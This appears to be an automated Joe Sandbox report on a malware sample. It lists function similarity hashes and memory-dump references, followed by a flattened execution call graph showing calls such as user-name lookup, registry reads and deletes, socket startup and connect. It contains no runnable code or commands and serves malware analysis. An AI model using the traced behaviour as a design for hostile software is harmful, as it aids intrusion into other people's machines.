                    • String ID: 2
                    • API String ID: 0-450215437
                    • Opcode ID: 0c8710ddd3d4e56a86cf6261f8225d7f9afef404df5168e53af1bc5d516da44e
                    • Instruction ID: ad2499aca4475e012535195ae9a294f731554bd72952cd38cc367a1af143e139
                    • Opcode Fuzzy Hash: 0c8710ddd3d4e56a86cf6261f8225d7f9afef404df5168e53af1bc5d516da44e
                    • Instruction Fuzzy Hash: D4322A71E0891D8FDB98DB18D898BA9B7B1FF59351F5042E9C00EE7292CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: jtr
                    • API String ID: 0-3145851702
                    • Opcode ID: 9ea4850c6a6a1e2834571244b66c156cf1a9144be5a094142717fae140c70a1b
                    • Instruction ID: ef5dac52d0325011d421e73831b0926849bd350e52d6ed05106de49f560b0356
                    • Opcode Fuzzy Hash: 9ea4850c6a6a1e2834571244b66c156cf1a9144be5a094142717fae140c70a1b
                    • Instruction Fuzzy Hash: 23014071D09E498EE754DF54E894AEEB7B2FB96361F10437AC00D97781DA385984CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: /
                    • API String ID: 0-2043925204
                    • Opcode ID: 80821b8615f60b33969dfe10c546349ac63ce98f465b16b9f8517a1d02a92454
                    • Instruction ID: 5ca5a836a994edbacdc74beca14679f02db4250700952ed97e2351bdf75e401f
                    • Opcode Fuzzy Hash: 80821b8615f60b33969dfe10c546349ac63ce98f465b16b9f8517a1d02a92454
                    • Instruction Fuzzy Hash: 3EF054B2D0491DDEE794DB54A8997E8B6B2FB58350F0042BAC10DD3282CE345980CF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4771880aa4186520f97962c8a44d06758f03c828dfef2fb0afb0f32281ae7798
                    • Instruction ID: ade63ae0d03ec7c981009a1077db71a8231f17aafcbeed1e455297dfa0714f2b
                    • Opcode Fuzzy Hash: 4771880aa4186520f97962c8a44d06758f03c828dfef2fb0afb0f32281ae7798
                    • Instruction Fuzzy Hash: 9432C97090891D8FDB94EF18D899BA9B7B1FF99355F1042E9D00DE72A1CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e83a5023aa7b1a7a4d857e49fa10480c4e63879604d8c652dbc3a3ecc9cbc44
                    • Instruction ID: 290c89fb1987c938147725393c8fd3503841b02cf6a93192a9b354e63fb09af1
                    • Opcode Fuzzy Hash: 9e83a5023aa7b1a7a4d857e49fa10480c4e63879604d8c652dbc3a3ecc9cbc44
                    • Instruction Fuzzy Hash: E4C1C871D0891D8FEB98DB18D898BA9B7B1FF95351F5442E9C00EE72A1CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7a584d5e8c3e839a2113cb97bd4397278cc6dea955282e9f11f9fac5beaecc9
                    • Instruction ID: 5f64ba81ff7e4d739899ee86e373ad509dbb8a25623562585a22b6551d9e4815
                    • Opcode Fuzzy Hash: f7a584d5e8c3e839a2113cb97bd4397278cc6dea955282e9f11f9fac5beaecc9
                    • Instruction Fuzzy Hash: EA91B975D0891D8FEBA4DF18D898BA9B7B1FB99345F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ceac443585823d3c0dfbba976a30702946df7578a3494eb6d2567900818209ef
                    • Instruction ID: 0dc61bc2a6b5c6d7fbe04dc3a398a69f9c8fbde68ede5e0ded5698c38ea7b55b
                    • Opcode Fuzzy Hash: ceac443585823d3c0dfbba976a30702946df7578a3494eb6d2567900818209ef
                    • Instruction Fuzzy Hash: 7781D871D1891D8FEBA4DB18D898BA9B7B1FF95351F5042E9C00EE72A1CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e35c3a0b95cfe40edf966310e573917f0a1676071d566b4ca7ddba2bf14aa3c
                    • Instruction ID: 6c134adb90789cd00625d14c88eb297c1781a9a76c68e15f27cf35a7d3230416
                    • Opcode Fuzzy Hash: 1e35c3a0b95cfe40edf966310e573917f0a1676071d566b4ca7ddba2bf14aa3c
                    • Instruction Fuzzy Hash: 3A71E872D1CA4A8FE795DA68A891ABDBBF0EF463A0F04017AC05DD73D2DB286845C351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5c84d0f7fc0d81f4926fcee97f088cfe56090975142c6bbe5b8db66a8590eb93
                    • Instruction ID: e04f02bc1db1d1b156ed54c689d240b69488d8795cb4a4a3db7b9563c25ecd18
                    • Opcode Fuzzy Hash: 5c84d0f7fc0d81f4926fcee97f088cfe56090975142c6bbe5b8db66a8590eb93
                    • Instruction Fuzzy Hash: 8E81A875D0891D8FEBA4DF18D898BA9B7B2FB99345F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50ae3aa7ccdd080be01fdd1c1102ca054dc6fb7a00bef87e0d7703a3d56d95d7
                    • Instruction ID: 710f3e509a12d8327af6c0275a1e707614cc01ede2969fd22c56a3f0c6b57e63
                    • Opcode Fuzzy Hash: 50ae3aa7ccdd080be01fdd1c1102ca054dc6fb7a00bef87e0d7703a3d56d95d7
                    • Instruction Fuzzy Hash: 2081B771D1891D8FEBA8EB18D899BA9B7B1FF95341F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9fd419cdfda2d0ab15a79ab81d8e6dd9dda4476e20c8e8a4cf48986cfceffe22
                    • Instruction ID: b586f2e4d0954a5ce5d7d78150a57292120fbefe80f41f7d110afb4039635229
                    • Opcode Fuzzy Hash: 9fd419cdfda2d0ab15a79ab81d8e6dd9dda4476e20c8e8a4cf48986cfceffe22
                    • Instruction Fuzzy Hash: BE81B771D1891D8FEBA8EB18D898BA9B7B1FF95345F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b2f2086cdbcc430c170edcaedb74787b1049026b6ff214a24173a86f5ddc8cb
                    • Instruction ID: 08ed4b4a0797adbf584529d0bdcf5e9772f1a48f203c210f49e20fd1c5da2e4b
                    • Opcode Fuzzy Hash: 5b2f2086cdbcc430c170edcaedb74787b1049026b6ff214a24173a86f5ddc8cb
                    • Instruction Fuzzy Hash: 5981A871D1891D8FEBA4EF18D898BA9B7B2FB95341F5042E9C00DE7265CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction ID: 50ec1deaf5f02d7fb84cced2ef27a5609f744d0e236149493616f120879caf5b
                    • Opcode Fuzzy Hash: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction Fuzzy Hash: 3E81B771D1891D8FEBA8EF18D898BA9B7B1FB95341F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction ID: 50ec1deaf5f02d7fb84cced2ef27a5609f744d0e236149493616f120879caf5b
                    • Opcode Fuzzy Hash: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction Fuzzy Hash: 3E81B771D1891D8FEBA8EF18D898BA9B7B1FB95341F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 76bdff1c44b5d445bcb78dd0168b81ee12c214fbbfed2e4d07f5d40e2003d18b
                    • Instruction ID: 2d72c3c920cca918e983964bcad0f9ee7870420b2262b93650707e9fa9bd2add
                    • Opcode Fuzzy Hash: 76bdff1c44b5d445bcb78dd0168b81ee12c214fbbfed2e4d07f5d40e2003d18b
                    • Instruction Fuzzy Hash: 26216B7190D6498FEB19DB50E4949ECBBB1EF1A350F1001AEC04EAB3A2CA78A844CB11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcd961308bdb2ad90c5aa7d6974d91d72b2c614ae249744982333387264bec4b
                    • Instruction ID: 8a89adc26f395b98f9d17247be8ee309ac13d8323c64dfc07d78ae058292750a
                    • Opcode Fuzzy Hash: bcd961308bdb2ad90c5aa7d6974d91d72b2c614ae249744982333387264bec4b
                    • Instruction Fuzzy Hash: 1B11903490C91A8FDBA4EA18D895AF9B3A5EB99391F5012F5D00ED7295CB34AA81CF00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6053cdbbc654e6ed6e8d517e0bc48aa286b4dff076d0bd443ff5aa60a5302176
                    • Instruction ID: f5055353d066d2a030c2d29c850d27b4715f5b8b81d145a94c8719a46b42278d
                    • Opcode Fuzzy Hash: 6053cdbbc654e6ed6e8d517e0bc48aa286b4dff076d0bd443ff5aa60a5302176
                    • Instruction Fuzzy Hash: 89110476D0CA8C8FDB51CB64A8556E97FA4FF4B320F1502B6C04DD32C2DA68A558C351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87f288b749f17bb93501336a7eae9aa2c51b8e78877c0f54237f940ddb1abbe4
                    • Instruction ID: 9e830f514dc0d9bcb1395ae6d4c9af7fd015458db6c738d1ec8d17c54310b7b2
                    • Opcode Fuzzy Hash: 87f288b749f17bb93501336a7eae9aa2c51b8e78877c0f54237f940ddb1abbe4
                    • Instruction Fuzzy Hash: D7116338A1892DCFDBA4EF18D894AA873F1FF99395F4411E5A00DD7261CA31E991CF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5afd2569b95e33e3920b0907ae206b3eb689f13488566a5cc9af46dee8784150
                    • Instruction ID: d76d01398a55f89b663c5b5c76ed227acb2d3258db3ae4c8171dd1eb4a28518c
                    • Opcode Fuzzy Hash: 5afd2569b95e33e3920b0907ae206b3eb689f13488566a5cc9af46dee8784150
                    • Instruction Fuzzy Hash: 89115E75D09A498FE755DF54D998BEDB7B2EF46351F0002BAC00DA7392CA385A84CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eccfed7e6d84c2cd01a05c67fb3ceac78bb7251395aecebd883df29e05f68839
                    • Instruction ID: 9643c65524cd925d3c728d19b6367101d4d2e5adab7880aefaee58c46c223651
                    • Opcode Fuzzy Hash: eccfed7e6d84c2cd01a05c67fb3ceac78bb7251395aecebd883df29e05f68839
                    • Instruction Fuzzy Hash: 6201F63191890E9FDF80EF589889BEA7BE0FF19350F104566E40CC7260DA30A594CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0c1c16ade9be4775ed64636dc1f80c0367d4bdb07fdc7222ac61c9624939c17
                    • Instruction ID: 339f4c0e3ea9c72fb57c8a57d4833ecc197be131a006e7563f0f9759291a831e
                    • Opcode Fuzzy Hash: c0c1c16ade9be4775ed64636dc1f80c0367d4bdb07fdc7222ac61c9624939c17
                    • Instruction Fuzzy Hash: 3B116D74A18A29CFDBA5EB18C895BE8B7B1FB59350F5041E5D00DE7291CB34AE84DF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:3.7%
                    Total number of Nodes:1713
                    Total number of Limit Nodes:74
calls 47196->47198 47199 4094cc 47197->47199 47200 4094e3 47198->47200 47201 401ef3 28 API calls 47199->47201 47202 401ef3 28 API calls 47200->47202 47204 4094d6 47201->47204 47203 4094f1 47202->47203 47205 401ee9 11 API calls 47203->47205 47207 401ee9 11 API calls 47204->47207 47206 4094f9 47205->47206 47621 4087f0 28 API calls 47206->47621 47209 409530 47207->47209 47211 409576 47209->47211 47212 409557 47209->47212 47210 40950b 47622 402ff4 47210->47622 47214 4086d0 28 API calls 47211->47214 47215 409574 47212->47215 47610 4086d0 47212->47610 47217 409584 47214->47217 47218 401ee9 11 API calls 47215->47218 47627 40977e 85 API calls 47217->47627 47222 409596 47218->47222 47220 401ef3 28 API calls 47225 409520 47220->47225 47222->46885 47226 401ee9 11 API calls 47225->47226 47226->47204 47228 41a18b GetUserNameW 47227->47228 47690 40415e 47228->47690 47233 402ff4 28 API calls 47234 41a1cd 47233->47234 47235 401ee9 11 API calls 47234->47235 47236 41a1d6 47235->47236 47237 401ee9 11 API calls 47236->47237 47238 40e740 47237->47238 47239 401ef3 47238->47239 47240 401f02 47239->47240 47247 401f4a 47239->47247 47241 402232 11 API calls 47240->47241 47242 401f0b 47241->47242 47243 401f4d 47242->47243 47245 401f26 47242->47245 47244 402316 11 API calls 47243->47244 47244->47247 47784 40303c 28 API calls 47245->47784 47248 401ee9 47247->47248 47249 402232 11 API calls 47248->47249 47250 401ef2 47249->47250 47250->46927 47250->46928 47252 412808 RegQueryValueExA RegCloseKey 47251->47252 47253 40e801 47251->47253 47252->47253 47253->46796 47253->46947 47255 41a7cd 47254->47255 47785 40ae7e 47255->47785 47257 41a7d5 47257->46781 47259 40e8af 47258->47259 47260 412d27 RegDeleteValueW 47258->47260 47259->46791 47260->47259 47262 40d25f 47261->47262 47263 4127e7 3 API calls 47262->47263 47264 40d266 47263->47264 47265 40d285 47264->47265 47799 4016e7 47264->47799 47269 414271 47265->47269 47267 40d273 47802 412b5f RegCreateKeyA 47267->47802 47270 4020bf 11 API calls 
47269->47270 47271 414285 47270->47271 47816 41a40e 47271->47816 47274 4020bf 11 API calls 47275 41429b 47274->47275 47276 401e45 22 API calls 47275->47276 47277 4142a9 47276->47277 47278 43a3ac _strftime 39 API calls 47277->47278 47279 4142b6 47278->47279 47280 4142c8 47279->47280 47281 4142bb Sleep 47279->47281 47282 402073 28 API calls 47280->47282 47281->47280 47283 4142d7 47282->47283 47284 401e45 22 API calls 47283->47284 47285 4142e0 47284->47285 47286 4020d6 28 API calls 47285->47286 47287 4142eb 47286->47287 47288 41a976 28 API calls 47287->47288 47289 4142f3 47288->47289 47820 40487e WSAStartup 47289->47820 47291 4142fd 47292 401e45 22 API calls 47291->47292 47293 414306 47292->47293 47294 401e45 22 API calls 47293->47294 47318 414385 47293->47318 47295 41431f 47294->47295 47298 401e45 22 API calls 47295->47298 47296 401e45 22 API calls 47296->47318 47297 4020d6 28 API calls 47297->47318 47299 414330 47298->47299 47301 401e45 22 API calls 47299->47301 47300 41a976 28 API calls 47300->47318 47302 414341 47301->47302 47303 401e45 22 API calls 47302->47303 47305 414352 47303->47305 47304 406292 28 API calls 47304->47318 47307 401e45 22 API calls 47305->47307 47306 401fc2 28 API calls 47306->47318 47308 414363 47307->47308 47309 401e45 22 API calls 47308->47309 47310 414375 47309->47310 47980 40471d 88 API calls 47310->47980 47313 4144d3 WSAGetLastError 47981 41b45a 47313->47981 47318->47296 47318->47297 47318->47300 47318->47304 47318->47306 47318->47313 47320 41a04a 79 API calls 47318->47320 47322 4052fe 28 API calls 47318->47322 47323 401e6d 11 API calls 47318->47323 47325 414d41 47318->47325 47327 408832 28 API calls 47318->47327 47329 402ef0 28 API calls 47318->47329 47330 402073 28 API calls 47318->47330 47331 401fb8 11 API calls 47318->47331 47334 4086d0 28 API calls 47318->47334 47336 4129e0 3 API calls 47318->47336 47337 41288e 31 API calls 47318->47337 47338 40415e 28 API calls 47318->47338 47343 401e45 22 API calls 47318->47343 47821 414230 
47318->47821 47827 40480d 47318->47827 47834 404f31 47318->47834 47849 4048a8 connect 47318->47849 47909 41a33b 47318->47909 47912 413904 47318->47912 47915 440751 47318->47915 47919 40d28d 47318->47919 47925 41a79d 47318->47925 47928 41a879 47318->47928 47932 41a6e9 47318->47932 47966 404e06 WaitForSingleObject 47318->47966 47992 4052dd 28 API calls 47318->47992 47320->47318 47322->47318 47323->47318 47324 401e45 22 API calls 47324->47325 47325->47318 47325->47324 47326 43a3ac _strftime 39 API calls 47325->47326 47362 402073 28 API calls 47325->47362 47363 41a04a 79 API calls 47325->47363 47364 401fb8 11 API calls 47325->47364 47365 401ee9 11 API calls 47325->47365 47994 40a5c4 84 API calls 47325->47994 47328 414e01 Sleep 47326->47328 47327->47318 47328->47318 47329->47318 47330->47318 47331->47318 47334->47318 47336->47318 47337->47318 47338->47318 47344 414780 GetTickCount 47343->47344 47345 41a6e9 28 API calls 47344->47345 47349 41479d 47345->47349 47347 41a6e9 28 API calls 47347->47349 47349->47347 47351 41a879 28 API calls 47349->47351 47353 402e81 28 API calls 47349->47353 47354 408832 28 API calls 47349->47354 47356 402ef0 28 API calls 47349->47356 47358 401fb8 11 API calls 47349->47358 47359 401ee9 11 API calls 47349->47359 47937 41a641 47349->47937 47939 41a5f1 47349->47939 47944 40ee14 29 API calls 47349->47944 47945 402f11 28 API calls 47349->47945 47946 408853 28 API calls 47349->47946 47947 404bf0 47349->47947 47993 404a81 60 API calls _Yarn 47349->47993 47351->47349 47353->47349 47354->47349 47356->47349 47358->47349 47359->47349 47362->47325 47363->47325 47364->47325 47365->47325 47366->46708 47367->46716 47368->46719 47371 4020bf 11 API calls 47370->47371 47372 40629e 47371->47372 47373 403280 28 API calls 47372->47373 47374 4062bb 47373->47374 47374->46741 47376 40e0a8 47375->47376 47377 41285b RegQueryValueExA RegCloseKey 47375->47377 47376->46738 47376->46760 47377->47376 47378->46744 47379->46780 47380->46771 47381->46761 47382->46779 47384 
401f66 11 API calls 47383->47384 47385 40cf54 47384->47385 47386 40cf74 47385->47386 47387 40cfa9 47385->47387 47389 40cf6a 47385->47389 48063 41a10f 29 API calls 47386->48063 47388 41ab12 GetCurrentProcess 47387->47388 47392 40cfae 47388->47392 47391 40d09d GetLongPathNameW 47389->47391 47394 40415e 28 API calls 47391->47394 47395 40cfb2 47392->47395 47396 40d004 47392->47396 47393 40cf7d 47397 401ef3 28 API calls 47393->47397 47398 40d0b2 47394->47398 47401 40415e 28 API calls 47395->47401 47400 40415e 28 API calls 47396->47400 47402 40cf87 47397->47402 47399 40415e 28 API calls 47398->47399 47403 40d0c1 47399->47403 47404 40d012 47400->47404 47405 40cfc0 47401->47405 47407 401ee9 11 API calls 47402->47407 48066 40d2d5 28 API calls 47403->48066 47410 40415e 28 API calls 47404->47410 47411 40415e 28 API calls 47405->47411 47407->47389 47408 40d0d4 48067 402f85 28 API calls 47408->48067 47413 40d028 47410->47413 47414 40cfd6 47411->47414 47412 40d0df 48068 402f85 28 API calls 47412->48068 48065 402f85 28 API calls 47413->48065 48064 402f85 28 API calls 47414->48064 47418 40d0e9 47421 401ee9 11 API calls 47418->47421 47419 40d033 47422 401ef3 28 API calls 47419->47422 47420 40cfe1 47423 401ef3 28 API calls 47420->47423 47424 40d0f3 47421->47424 47425 40d03e 47422->47425 47426 40cfec 47423->47426 47427 401ee9 11 API calls 47424->47427 47428 401ee9 11 API calls 47425->47428 47429 401ee9 11 API calls 47426->47429 47430 40d0fc 47427->47430 47431 40d047 47428->47431 47432 40cff5 47429->47432 47433 401ee9 11 API calls 47430->47433 47434 401ee9 11 API calls 47431->47434 47435 401ee9 11 API calls 47432->47435 47436 40d105 47433->47436 47434->47402 47435->47402 47437 401ee9 11 API calls 47436->47437 47438 40d10e 47437->47438 47439 401ee9 11 API calls 47438->47439 47440 40d117 47439->47440 47440->46831 47441->46844 47442->46865 47444 412a06 RegQueryValueExA RegCloseKey 47443->47444 47445 412a2a 47443->47445 47444->47445 47445->46824 47446->46859 47449 432dfa 47447->47449 
47448 43a620 ___std_exception_copy 21 API calls 47448->47449 47449->47448 47450 40e5ee 47449->47450 48069 441850 7 API calls 2 library calls 47449->48069 48070 433530 RaiseException __CxxThrowException@8 new 47449->48070 48071 433513 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47449->48071 47450->46893 47454->46923 47455->46910 47457->46955 47458->46766 47461 41a020 LoadResource LockResource SizeofResource 47460->47461 47462 40e8fb 47460->47462 47461->47462 47462->47052 47464 402097 28 API calls 47463->47464 47465 406460 47464->47465 47465->47063 47480 40421a 47466->47480 47470 41b74c 47469->47470 47471 41b7ab 47470->47471 47476 41b75c 47470->47476 47472 41b7c5 47471->47472 47473 41b8eb 28 API calls 47471->47473 47495 41ba51 28 API calls 47472->47495 47473->47472 47475 41b794 47494 41ba51 28 API calls 47475->47494 47476->47475 47486 41b8eb 47476->47486 47477 41b7a7 47477->47084 47481 404223 47480->47481 47482 4023ae 11 API calls 47481->47482 47483 40422e 47482->47483 47484 402549 28 API calls 47483->47484 47485 404195 47484->47485 47485->47084 47488 41b8f3 47486->47488 47487 41b925 47487->47475 47488->47487 47489 41b929 47488->47489 47492 41b90d 47488->47492 47506 402705 22 API calls std::_Xinvalid_argument 47489->47506 47496 41b95c 47492->47496 47494->47477 47495->47477 47497 41b966 __EH_prolog 47496->47497 47507 4026f7 22 API calls 47497->47507 47499 41b979 47508 41ba68 11 API calls 47499->47508 47501 41b99f 47502 41b9d7 47501->47502 47509 402710 11 API calls 47501->47509 47502->47487 47504 41b9be 47510 4026f2 11 API calls std::_Deallocate 47504->47510 47507->47499 47508->47501 47509->47504 47510->47502 47511->47089 47515 40328a 47513->47515 47514 4032a9 47514->47099 47515->47514 47516 4028c8 28 API calls 47515->47516 47516->47514 47518 4051db 47517->47518 47527 405254 47518->47527 47520 4051e8 47520->47102 47522 402041 47521->47522 47523 4023ae 11 API calls 47522->47523 47524 40205b 47523->47524 47549 40265a 47524->47549 47528 405262 
47527->47528 47529 405268 47528->47529 47530 40527e 47528->47530 47538 4025d0 47529->47538 47531 4052d5 47530->47531 47532 405296 47530->47532 47547 402884 22 API calls std::_Xinvalid_argument 47531->47547 47536 4028c8 28 API calls 47532->47536 47537 40527c 47532->47537 47536->47537 47537->47520 47539 402868 22 API calls 47538->47539 47540 4025e2 47539->47540 47541 402652 47540->47541 47542 402609 47540->47542 47548 402884 22 API calls std::_Xinvalid_argument 47541->47548 47545 4028c8 28 API calls 47542->47545 47546 40261b 47542->47546 47545->47546 47546->47537 47550 40266b 47549->47550 47551 4023ae 11 API calls 47550->47551 47552 40206d 47551->47552 47552->47105 47553->47113 47554->47115 47557 41ab1f GetCurrentProcess 47556->47557 47558 419e2c 47556->47558 47557->47558 47559 41288e RegOpenKeyExA 47558->47559 47560 4128bc RegQueryValueExA RegCloseKey 47559->47560 47561 4128e6 47559->47561 47560->47561 47562 402073 28 API calls 47561->47562 47563 4128fb 47562->47563 47563->47126 47564->47134 47566 4024d9 47565->47566 47567 4024ea 28 API calls 47566->47567 47568 402091 47567->47568 47568->46837 47585 43a30a 47569->47585 47571 439750 47591 4390b7 35 API calls 3 library calls 47571->47591 47573 439715 47573->47571 47574 43972a 47573->47574 47576 43972f pre_c_initialization 47573->47576 47590 43eead 20 API calls __dosmaperr 47574->47590 47576->47167 47578 43975c 47580 43978b 47578->47580 47592 43a34f 39 API calls __Tolower 47578->47592 47579 4397f7 47594 43a2b6 20 API calls 2 library calls 47579->47594 47580->47579 47593 43a2b6 20 API calls 2 library calls 47580->47593 47583 4398be _strftime 47583->47576 47595 43eead 20 API calls __dosmaperr 47583->47595 47586 43a322 47585->47586 47587 43a30f 47585->47587 47586->47573 47596 43eead 20 API calls __dosmaperr 47587->47596 47589 43a314 pre_c_initialization 47589->47573 47590->47576 47591->47578 47592->47578 47593->47579 47594->47583 47595->47576 47596->47589 47603 401f90 